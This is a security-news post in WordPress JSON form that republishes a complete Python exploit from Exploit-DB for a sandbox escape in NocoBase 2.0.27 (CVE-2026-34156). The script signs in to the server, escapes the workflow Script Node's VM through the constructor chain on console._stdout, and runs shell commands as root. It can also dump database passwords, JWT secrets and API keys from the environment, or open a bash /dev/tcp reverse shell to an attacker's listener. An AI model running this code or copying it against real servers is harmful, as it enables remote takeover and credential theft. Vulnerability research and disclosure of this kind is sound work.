{"id":52110,"date":"2026-05-07T10:34:45","date_gmt":"2026-05-07T10:34:45","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=52110"},"modified":"2026-05-07T10:34:45","modified_gmt":"2026-05-07T10:34:45","slug":"nocobase-2027-vm-sandbox-escape","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=52110","title":{"rendered":"NocoBase 2.0.27 – VM Sandbox Escape_EDB-ID:52552"},"content":{"rendered":"

{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: NocoBase 2.0.27 – VM Sandbox Escape Date: 2026-03-26 Exploit Author: Onurcan Gen\u00e7 Vendor Homepage: https:\/\/www.nocobase.com\/ Software Link: https:\/\/github.com\/nocobase\/nocobase Version: = 2.0.27 \u2014 patched in 2.0.28 Tested on: Debian…”,”published”:”2026-05-07T00:00:00″,”modified”:”2026-05-07T00:00:00″,”type”:”exploitdb”,”title”:”NocoBase 2.0.27 – VM Sandbox Escape”,”source”:””,”references”:””,”id”:”EDB-ID:52552″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-34156″],”sourceData”:”# Exploit Title: NocoBase 2.0.27 – VM Sandbox Escape \\r\\n# Date: 2026-03-26\\r\\n# Exploit Author: Onurcan Gen\u00e7\\r\\n# Vendor Homepage: https:\/\/www.nocobase.com\/\\r\\n# Software Link: https:\/\/github.com\/nocobase\/nocobase\\r\\n# Version: \\u003c= 2.0.27 \u2014 patched in 2.0.28\\r\\n# Tested on: Debian GNU\/Linux 12 (bookworm) \/ Docker \/ Node.js v20.20.1\\r\\n# CVE: CVE-2026-34156\\r\\n# Advisory: https:\/\/github.com\/nocobase\/nocobase\/security\/advisories\/GHSA-px3p-vgh9-m57c\\r\\n# CWE: CWE-913\\r\\n# CVSS: 9.9 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H)\\r\\n#\\r\\n# Description:\\r\\n# NocoBase’s Workflow Script Node executes user-supplied JavaScript inside\\r\\n# a Node.js vm sandbox with a custom require allowlist. However, the console\\r\\n# object passed into the sandbox exposes host-realm WritableWorkerStdio\\r\\n# stream objects (console._stdout \/ console._stderr). By traversing the\\r\\n# prototype chain (.constructor.constructor), an attacker obtains the host\\r\\n# realm’s Function constructor, accesses the process object, and uses\\r\\n# process.mainModule.require to load child_process \u2014 bypassing the sandbox\\r\\n# and achieving Remote Code Execution as root.\\r\\n#\\r\\n# Exploitation chain:\\r\\n# console._stdout.constructor.constructor \u2192 host-realm Function\\r\\n# Function(‘return process’)() \u2192 Node.js process object\\r\\n# process.mainModule.require(‘child_process’) \u2192 unrestricted module\\r\\n# child_process.execSync(‘id’) \u2192 RCE as root\\r\\n#\\r\\n# Usage:\\r\\n# python3 exploit.py -t \\u003cTARGET\\u003e -u \\u003cUSER\\u003e -P \\u003cPASS\\u003e –cmd \\”id\\”\\r\\n# python3 exploit.py -t \\u003cTARGET\\u003e -u \\u003cUSER\\u003e -P \\u003cPASS\\u003e –dump\\r\\n# python3 exploit.py -t \\u003cTARGET\\u003e -u \\u003cUSER\\u003e -P \\u003cPASS\\u003e -l \\u003cLHOST\\u003e -p \\u003cLPORT\\u003e\\r\\n#\\r\\n# Notes:\\r\\n# – Requires valid credentials (any user with workflow access)\\r\\n# – Vulnerability check runs automatically before exploitation\\r\\n# – Default reverse shell uses bash \/dev\/tcp (Debian-based containers)\\r\\n# – Start listener before running: nc -lvnp 4444\\r\\n\\r\\nimport argparse\\r\\nimport json\\r\\nimport requests\\r\\nimport sys\\r\\nimport urllib3\\r\\n\\r\\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\r\\n\\r\\n# \u2500\u2500\u2500 Colors \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\r\\n\\r\\nclass C:\\r\\n RED = \\”\\\\033[91m\\”\\r\\n GREEN = \\”\\\\033[92m\\”\\r\\n YELLOW = \\”\\\\033[93m\\”\\r\\n BLUE = \\”\\\\033[94m\\”\\r\\n MAGENTA = \\”\\\\033[95m\\”\\r\\n CYAN = \\”\\\\033[96m\\”\\r\\n WHITE = \\”\\\\033[97m\\”\\r\\n BOLD = \\”\\\\033[1m\\”\\r\\n DIM = \\”\\\\033[2m\\”\\r\\n RESET = \\”\\\\033[0m\\”\\r\\n\\r\\ndef info(msg): print(f\\” {C.BLUE}[*]{C.RESET} {msg}\\”)\\r\\ndef good(msg): print(f\\” {C.GREEN}[+]{C.RESET} {msg}\\”)\\r\\ndef warn(msg): print(f\\” {C.YELLOW}[!]{C.RESET} {msg}\\”)\\r\\ndef fail(msg): print(f\\” {C.RED}[-]{C.RESET} {msg}\\”)\\r\\ndef result(msg): print(f\\” {C.CYAN}[\u2192]{C.RESET} {msg}\\”)\\r\\n\\r\\nBANNER = f\\”\\”\\”\\r\\n{C.RED}{C.BOLD}\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\r\\n\u2551 NocoBase Workflow Script Node \u2014 VM Sandbox Escape to RCE \u2551\\r\\n\u2551 CVE: [CVE-2026-34156] | CVSS: 9.9 Critical \u2551\\r\\n\u2551 Author: Onurcan Gen\u00e7 \u2551\\r\\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d{C.RESET}\\r\\n\\”\\”\\”\\r\\n\\r\\nESCAPE_CHAIN = (\\r\\n \\”const Fn=console._stdout.constructor.constructor;\\”\\r\\n \\”const proc=Fn(‘return process’)();\\”\\r\\n \\”const cp=proc.mainModule.require(‘child_process’);\\”\\r\\n)\\r\\n\\r\\n\\r\\n# \u2500\u2500\u2500 Core Functions \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\r\\n\\r\\ndef authenticate(target: str, username: str, password: str, verify_ssl: bool = False) -\\u003e str:\\r\\n url = f\\”{target.rstrip(‘\/’)}\/api\/auth:signIn\\”\\r\\n body = {\\”account\\”: username, \\”password\\”: password}\\r\\n\\r\\n print()\\r\\n info(f\\”Authenticating as {C.BOLD}{username}{C.RESET}…\\”)\\r\\n\\r\\n try:\\r\\n resp = requests.post(url, headers={\\”Content-Type\\”: \\”application\/json\\”},\\r\\n json=body, timeout=10, verify=verify_ssl)\\r\\n data = resp.json()\\r\\n except requests.exceptions.ConnectionError:\\r\\n fail(f\\”Connection failed: cannot reach {C.YELLOW}{url}{C.RESET}\\”)\\r\\n sys.exit(1)\\r\\n except json.JSONDecodeError:\\r\\n fail(f\\”Invalid response from server\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n if \\”errors\\” in data:\\r\\n msg = data[\\”errors\\”][0].get(\\”message\\”, \\”Unknown error\\”)\\r\\n fail(f\\”Authentication failed: {C.RED}{msg}{C.RESET}\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n token = data.get(\\”data\\”, {}).get(\\”token\\”)\\r\\n if not token:\\r\\n fail(\\”No token in response\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n nickname = data.get(\\”data\\”, {}).get(\\”user\\”, {}).get(\\”nickname\\”, \\”unknown\\”)\\r\\n user_id = data.get(\\”data\\”, {}).get(\\”user\\”, {}).get(\\”id\\”, \\”?\\”)\\r\\n good(f\\”Authenticated! User: {C.GREEN}{C.BOLD}{nickname}{C.RESET} (ID: {user_id})\\”)\\r\\n good(f\\”Token: {C.DIM}{token[:25]}…{token[-10:]}{C.RESET}\\”)\\r\\n return token\\r\\n\\r\\n\\r\\ndef send_payload(target: str, token: str, payload: str, verify_ssl: bool = False) -\\u003e dict:\\r\\n url = f\\”{target.rstrip(‘\/’)}\/api\/flow_nodes:test\\”\\r\\n headers = {\\r\\n \\”Authorization\\”: f\\”Bearer {token}\\”,\\r\\n \\”Content-Type\\”: \\”application\/json\\”\\r\\n }\\r\\n body = {\\r\\n \\”type\\”: \\”script\\”,\\r\\n \\”config\\”: {\\”content\\”: payload, \\”timeout\\”: 5000, \\”arguments\\”: []}\\r\\n }\\r\\n\\r\\n try:\\r\\n resp = requests.post(url, headers=headers, json=body, timeout=10, verify=verify_ssl)\\r\\n return resp.json()\\r\\n except requests.exceptions.Timeout:\\r\\n return {\\”data\\”: {\\”status\\”: 1, \\”result\\”: \\”timeout (expected for reverse shell)\\”}}\\r\\n except requests.exceptions.ConnectionError as e:\\r\\n return {\\”error\\”: f\\”Connection failed: {e}\\”}\\r\\n except json.JSONDecodeError:\\r\\n return {\\”error\\”: \\”Invalid JSON response\\”, \\”raw\\”: resp.text[:500]}\\r\\n\\r\\n\\r\\ndef verify_vulnerability(target: str, token: str) -\\u003e bool:\\r\\n print()\\r\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n info(f\\”{C.BOLD}Phase 1: Vulnerability Check{C.RESET}\\”)\\r\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n check_payload = (\\r\\n \\”try {\\”\\r\\n \\” const name = console._stdout.constructor.name;\\”\\r\\n \\” const fnType = typeof console._stdout.constructor.constructor;\\”\\r\\n \\” return JSON.stringify({stream: name, fnConstructor: fnType});\\”\\r\\n \\”} catch(e) { return ‘ERR: ‘ + e.message; }\\”\\r\\n )\\r\\n result_data = send_payload(target, token, check_payload)\\r\\n\\r\\n if \\”error\\” in result_data:\\r\\n fail(f\\”Connection error: {result_data[‘error’]}\\”)\\r\\n return False\\r\\n\\r\\n data = result_data.get(\\”data\\”, {})\\r\\n\\r\\n if data.get(\\”status\\”) != 1:\\r\\n if \\”INVALID_TOKEN\\” in str(data) or \\”EMPTY_TOKEN\\” in str(data):\\r\\n fail(\\”Authentication token is invalid or expired\\”)\\r\\n else:\\r\\n fail(f\\”Unexpected response: {data}\\”)\\r\\n return False\\r\\n\\r\\n try:\\r\\n check = json.loads(data.get(\\”result\\”, \\”{}\\”))\\r\\n stream = check.get(\\”stream\\”, \\”\\”)\\r\\n fn_type = check.get(\\”fnConstructor\\”, \\”\\”)\\r\\n\\r\\n if stream == \\”WritableWorkerStdio\\” and fn_type == \\”function\\”:\\r\\n good(f\\”Host-realm stream object: {C.GREEN}{C.BOLD}{stream}{C.RESET}\\”)\\r\\n good(f\\”Function constructor: {C.GREEN}{C.BOLD}accessible{C.RESET}\\”)\\r\\n print()\\r\\n good(f\\”{C.GREEN}{C.BOLD}TARGET IS VULNERABLE!{C.RESET}\\”)\\r\\n return True\\r\\n else:\\r\\n fail(f\\”Unexpected sandbox state: stream={stream}, fn={fn_type}\\”)\\r\\n return False\\r\\n except (json.JSONDecodeError, TypeError):\\r\\n res = data.get(\\”result\\”, \\”\\”)\\r\\n fail(f\\”Check failed: {res}\\”)\\r\\n return False\\r\\n\\r\\n\\r\\n# \u2500\u2500\u2500 Exploit Modes \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\r\\n\\r\\ndef exploit_cmd(target: str, token: str, cmd: str):\\r\\n print()\\r\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n info(f\\”{C.BOLD}Phase 2: Command Execution{C.RESET}\\”)\\r\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n info(f\\”Executing: {C.YELLOW}{cmd}{C.RESET}\\”)\\r\\n\\r\\n safe_cmd = cmd.replace(\\”\\\\\\\\\\”, \\”\\\\\\\\\\\\\\\\\\”).replace(\\”‘\\”, \\”\\\\\\\\’\\”).replace(‘\\”‘, ‘\\\\\\\\\\”‘)\\r\\n payload = f'{ESCAPE_CHAIN}return cp.execSync(\\”{safe_cmd}\\”).toString().trim();’\\r\\n resp = send_payload(target, token, payload)\\r\\n\\r\\n data = resp.get(\\”data\\”, {})\\r\\n if data.get(\\”status\\”) == 1:\\r\\n output = data.get(\\”result\\”, \\”\\”)\\r\\n print()\\r\\n good(f\\”Output:\\”)\\r\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n for line in output.split(\\”\\\\n\\”):\\r\\n print(f\\” {C.WHITE}{line}{C.RESET}\\”)\\r\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n else:\\r\\n fail(f\\”Execution failed: {data}\\”)\\r\\n\\r\\n\\r\\ndef exploit_revshell(target: str, token: str, lhost: str, lport: int):\\r\\n print()\\r\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n info(f\\”{C.BOLD}Phase 2: Reverse Shell{C.RESET}\\”)\\r\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n info(f\\”Target: {C.YELLOW}{target}{C.RESET}\\”)\\r\\n info(f\\”Callback: {C.GREEN}{C.BOLD}{lhost}:{lport}{C.RESET}\\”)\\r\\n warn(f\\”Ensure listener is running: {C.BOLD}nc -lvnp {lport}{C.RESET}\\”)\\r\\n print()\\r\\n\\r\\n shell_cmd = f’bash -c \\”bash -i \\u003e\\u0026 \/dev\/tcp\/{lhost}\/{lport} 0\\u003e\\u00261\\”‘\\r\\n payload = f\\”{ESCAPE_CHAIN}cp.exec(‘{shell_cmd}’);return ‘shell spawned’;\\”\\r\\n resp = send_payload(target, token, payload)\\r\\n\\r\\n data = resp.get(\\”data\\”, {})\\r\\n res = data.get(\\”result\\”, \\”\\”)\\r\\n\\r\\n if \\”shell spawned\\” in str(res) or \\”timeout\\” in str(res):\\r\\n good(f\\”{C.GREEN}{C.BOLD}Payload delivered! Check your listener.{C.RESET}\\”)\\r\\n else:\\r\\n fail(f\\”Unexpected response: {data}\\”)\\r\\n\\r\\n\\r\\ndef exploit_dump(target: str, token: str):\\r\\n print()\\r\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n info(f\\”{C.BOLD}Phase 2: System \\u0026 Credential Dump{C.RESET}\\”)\\r\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n # System info via shell commands\\r\\n commands = [\\r\\n (\\”User\\”, \\”id\\”),\\r\\n (\\”Hostname\\”, \\”hostname\\”),\\r\\n (\\”OS\\”, \\”cat \/etc\/os-release | grep PRETTY_NAME | cut -d= -f2\\”),\\r\\n (\\”Kernel\\”, \\”uname -r\\”),\\r\\n (\\”Node.js\\”, \\”node –version\\”),\\r\\n (\\”Working Dir\\”, \\”pwd\\”),\\r\\n ]\\r\\n\\r\\n print()\\r\\n info(f\\”{C.BOLD}System Information{C.RESET}\\”)\\r\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n for label, cmd in commands:\\r\\n safe_cmd = cmd.replace(‘\\”‘, ‘\\\\\\\\\\”‘)\\r\\n payload = f'{ESCAPE_CHAIN}return cp.execSync(\\”{safe_cmd}\\”).toString().trim();’\\r\\n resp = send_payload(target, token, payload)\\r\\n data = resp.get(\\”data\\”, {})\\r\\n if data.get(\\”status\\”) == 1:\\r\\n out = data.get(\\”result\\”, \\”N\/A\\”).replace(‘\\”‘, ”)\\r\\n print(f\\” {C.WHITE}{label:.\\u003c22}{C.RESET} {C.GREEN}{out}{C.RESET}\\”)\\r\\n\\r\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n # Credentials via JavaScript\\r\\n print()\\r\\n info(f\\”{C.BOLD}Environment Credentials{C.RESET}\\”)\\r\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n secrets_payload = (\\r\\n f\\”{ESCAPE_CHAIN}\\”\\r\\n \\”const env = proc.env;\\”\\r\\n \\”const keys = [‘DB_HOST’,’DB_PORT’,’DB_DATABASE’,’DB_USER’,’DB_PASSWORD’,\\”\\r\\n \\”‘DB_DIALECT’,’INIT_ROOT_USERNAME’,’INIT_ROOT_PASSWORD’,’INIT_ROOT_NICKNAME’,\\”\\r\\n \\”‘INIT_ROOT_EMAIL’,’APP_KEY’,’API_KEY’,’JWT_SECRET’,’SECRET_KEY’];\\”\\r\\n \\”const out = {}; keys.forEach(k =\\u003e { if(env[k]) out[k] = env[k]; });\\”\\r\\n \\”return JSON.stringify(out);\\”\\r\\n )\\r\\n resp = send_payload(target, token, secrets_payload)\\r\\n data = resp.get(\\”data\\”, {})\\r\\n\\r\\n if data.get(\\”status\\”) == 1:\\r\\n try:\\r\\n creds = json.loads(data.get(\\”result\\”, \\”{}\\”))\\r\\n for k, v in creds.items():\\r\\n color = C.RED if \\”PASS\\” in k or \\”SECRET\\” in k or \\”KEY\\” in k else C.YELLOW\\r\\n print(f\\” {C.WHITE}{k:.\\u003c30}{C.RESET} {color}{C.BOLD}{v}{C.RESET}\\”)\\r\\n except json.JSONDecodeError:\\r\\n result(f\\”Raw: {data.get(‘result’)}\\”)\\r\\n\\r\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n # All env vars with sensitive patterns\\r\\n print()\\r\\n info(f\\”{C.BOLD}Additional Secrets (pattern match){C.RESET}\\”)\\r\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n extra_payload = (\\r\\n f\\”{ESCAPE_CHAIN}\\”\\r\\n \\”const env = proc.env;\\”\\r\\n \\”const out = {};\\”\\r\\n \\”for (const k of Object.keys(env)) {\\”\\r\\n \\” if (\/secret|key|token|pass|auth|jwt|api_key|private\/i.test(k) \\u0026\\u0026 \\”\\r\\n \\” !k.startsWith(‘npm_’)) out[k] = env[k];\\”\\r\\n \\”}\\”\\r\\n \\”return JSON.stringify(out);\\”\\r\\n )\\r\\n resp = send_payload(target, token, extra_payload)\\r\\n data = resp.get(\\”data\\”, {})\\r\\n\\r\\n if data.get(\\”status\\”) == 1:\\r\\n try:\\r\\n extras = json.loads(data.get(\\”result\\”, \\”{}\\”))\\r\\n if extras:\\r\\n for k, v in extras.items():\\r\\n print(f\\” {C.WHITE}{k:.\\u003c30}{C.RESET} {C.RED}{C.BOLD}{v}{C.RESET}\\”)\\r\\n else:\\r\\n info(\\”No additional secrets found\\”)\\r\\n except json.JSONDecodeError:\\r\\n pass\\r\\n\\r\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\r\\n\\r\\n\\r\\n# \u2500\u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\r\\n\\r\\ndef main():\\r\\n print(BANNER)\\r\\n\\r\\n parser = argparse.ArgumentParser(\\r\\n description=\\”NocoBase Workflow Script Node \u2014 VM Sandbox Escape to RCE\\”,\\r\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\r\\n epilog=f\\”\\”\\”\\r\\n{C.BOLD}Examples:{C.RESET}\\r\\n {C.CYAN}Command:{C.RESET} %(prog)s -t http:\/\/target:13000 -u nocobase -P admin123 –cmd \\”id\\”\\r\\n {C.CYAN}Dump:{C.RESET} %(prog)s -t http:\/\/target:13000 -u nocobase -P admin123 –dump\\r\\n {C.CYAN}Reverse Shell:{C.RESET} %(prog)s -t http:\/\/target:13000 -u nocobase -P admin123 -l 10.10.14.5 -p 4444\\r\\n \\”\\”\\”\\r\\n )\\r\\n parser.add_argument(\\”-t\\”, \\”–target\\”, required=True,\\r\\n help=\\”Target NocoBase URL (e.g., http:\/\/target:13000)\\”)\\r\\n parser.add_argument(\\”-u\\”, \\”–username\\”, required=True,\\r\\n help=\\”NocoBase username\\”)\\r\\n parser.add_argument(\\”-P\\”, \\”–password\\”, required=True,\\r\\n help=\\”NocoBase password\\”)\\r\\n parser.add_argument(\\”-l\\”, \\”–lhost\\”, default=None,\\r\\n help=\\”Listener IP for reverse shell\\”)\\r\\n parser.add_argument(\\”-p\\”, \\”–lport\\”, type=int, default=4444,\\r\\n help=\\”Listener port (default: 4444)\\”)\\r\\n parser.add_argument(\\”–cmd\\”, default=None,\\r\\n help=\\”Execute a single command\\”)\\r\\n parser.add_argument(\\”–dump\\”, action=\\”store_true\\”,\\r\\n help=\\”Dump system info and credentials\\”)\\r\\n parser.add_argument(\\”–no-verify\\”, action=\\”store_true\\”,\\r\\n help=\\”Skip vulnerability verification\\”)\\r\\n\\r\\n args = parser.parse_args()\\r\\n\\r\\n if not args.cmd and not args.lhost and not args.dump:\\r\\n fail(f\\”Specify {C.BOLD}–cmd{C.RESET} (command), {C.BOLD}–dump{C.RESET} (info), or {C.BOLD}-l LHOST{C.RESET} (revshell)\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n # Phase 0: Authenticate\\r\\n token = authenticate(args.target, args.username, args.password)\\r\\n\\r\\n # Phase 1: Vulnerability check (always runs unless –no-verify)\\r\\n if not args.no_verify:\\r\\n if not verify_vulnerability(args.target, token):\\r\\n fail(f\\”{C.RED}{C.BOLD}TARGET IS NOT VULNERABLE.{C.RESET} Exiting.\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n # Phase 2: Exploit\\r\\n if args.dump:\\r\\n exploit_dump(args.target, token)\\r\\n elif args.cmd:\\r\\n exploit_cmd(args.target, token, args.cmd)\\r\\n else:\\r\\n exploit_revshell(args.target, token, args.lhost, args.lport)\\r\\n\\r\\n print()\\r\\n print(f\\” {C.GREEN}{C.BOLD}Done.{C.RESET}\\”)\\r\\n print()\\r\\n\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52552″,”cvss”:{“score”:9.9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52552″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: NocoBase 2.0.27 – VM Sandbox Escape Date: 2026-03-26 Exploit Author: Onurcan Gen\u00e7 Vendor Homepage: https:\/\/www.nocobase.com\/ Software Link: https:\/\/github.com\/nocobase\/nocobase Version: = 2.0.27 \u2014 patched…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,45,12,40,13,7,11,5],"class_list":["post-52110","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-99","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nNocoBase 2.0.27 - VM Sandbox Escape_EDB-ID:52552 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=52110\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"NocoBase 2.0.27 - VM Sandbox Escape_EDB-ID:52552 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: NocoBase 2.0.27 – VM Sandbox Escape Date: 2026-03-26 Exploit Author: Onurcan Gen\u00e7 Vendor Homepage: https:\/\/www.nocobase.com\/ Software Link: https:\/\/github.com\/nocobase\/nocobase Version: = 2.0.27 \u2014 patched...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=52110\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-07T10:34:45+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52110#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52110\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"NocoBase 2.0.27 – VM Sandbox Escape_EDB-ID:52552\",\"datePublished\":\"2026-05-07T10:34:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52110\"},\"wordCount\":2776,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.9\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=52110#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52110\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52110\",\"name\":\"NocoBase 2.0.27 - VM Sandbox Escape_EDB-ID:52552 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-07T10:34:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52110#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=52110\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52110#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"NocoBase 2.0.27 